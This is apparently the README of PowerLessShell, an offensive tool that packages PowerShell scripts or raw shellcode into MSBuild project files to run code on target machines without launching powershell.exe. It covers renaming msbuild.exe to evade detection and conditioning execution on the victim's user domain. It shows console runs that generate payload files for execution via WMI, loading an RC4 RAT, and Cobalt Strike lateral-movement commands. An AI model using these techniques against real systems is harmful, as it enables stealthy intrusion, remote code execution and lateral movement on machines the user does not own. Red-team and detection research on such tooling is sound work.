PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.
To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary.
- You can provide -knownprocess switch to use known Windows process name instead of renaming MsBuild.exe to something random
MSBuild support condition that can be used to avoid running code if the condition is not met.
<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">
The malicious code will only be executed if the current user domain is "RingZer0"
Condition supports several other formats that can be used to create more conditional execution check.
<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'">
Property Functions also expose interesting data.
https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions
Raw shellcode
$ python PowerLessShell.py
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\!!!// .'_.'
`.`.\|//.'.'
|`._`n'_.'|
`----^----"
(Set payload type 'powershell, shellcode')>>> shellcode
(Path to the raw shellcode file)>>> shellcode.raw
(Path for the generated MsBuild out file)>>> payload.csproj
(Set USERDOMAIN condition (Default ''))>>> RingZer0
(Use known process name to perform MsBuild renaming (Default: False))>>>
[+] payload.csproj was generated.
[+] payload.csproj.cmd was generated.
[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
Powershell
$ python PowerLessShell.py
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\!!!// .'_.'
`.`.\|//.'.'
|`._`n'_.'|
`----^----"
(Set payload type 'powershell, shellcode')>>> powershell
(Path to the PowerShell script)>>> payload.ps1
(Path for the generated MsBuild out file)>>> payload.csproj
(Set USERDOMAIN condition (Default ''))>>>
(Use known process name to perform MsBuild renaming (Default: False))>>>
[+] payload.csproj was generated.
[+] payload.csproj.cmd was generated.
[+] Run the command inside of payload.csproj.cmd on the target system using WMI.
Inline command
python PowerLessShell.py powershell.ps1 output (optional shellcode, -knownprocess)
PowerLessShell - Remain Stealth
More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
___
.-"; ! ;"-.
.'! : | : !`.
/\ ! : ! : ! /\
/\ | ! :|: ! | /\
( \ \ ; :!: ; / / )
( `. \ | !:|:! | / .' )
(`. \ \ \!:|:!/ / / .')
\ `.`.\ |!|! |/,'.' /
`._`.\\!!!// .'_.'
`.`.\|//.'.'
|`._`n'_.'|
`----^----"
[+] output was generated.
[+] output.cmd was generated.
[+] Run the command inside of output.cmd on the target system using WMI.
The following example is running the RC4 RAT https://github.com/Mr-Un1k0d3r/RC4-PowerShell-RAT without running a single instance of PowerShell
cd into your cobalt strike client directory
cd /root/cobaltstrike
Clone this repository into folder PowerLessShell
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
Load the aggressor script in your Cobalt Strike Console Laterally move just like other Cobalt Strike macros:
wmi_msbuild [target] [listener]
Mr.Un1k0d3r RingZer0 Team 2017